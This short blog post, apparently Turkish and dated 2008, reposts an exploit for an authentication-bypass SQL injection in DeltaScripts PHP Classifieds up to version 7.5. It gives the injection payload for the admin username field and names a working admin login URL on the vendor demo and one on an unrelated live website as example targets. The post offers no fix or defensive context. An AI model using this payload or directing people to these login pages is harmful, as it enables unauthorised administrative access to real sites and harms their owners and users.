"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

7 Kasım 2008 Cuma

DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln

DeltaScripts PHP Classifieds <= 7.5 (Auth Bypass) SQL Injection Vuln

link: http://www.milw0rm.com/exploits/7023

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin



admin login for demo:

http://demo.deltascripts.com/classifieds/admin/login.php


example for demo:

admin: admin ' or ' 1=1

passwd: ZoRLu



example 2:

admin login:

http://www.maramuresul-istoric.ro/anunturi/admin/login.php



admin: admin ' or ' 1=1

passwd: ZoRLu


0 yorum:

 
Dizi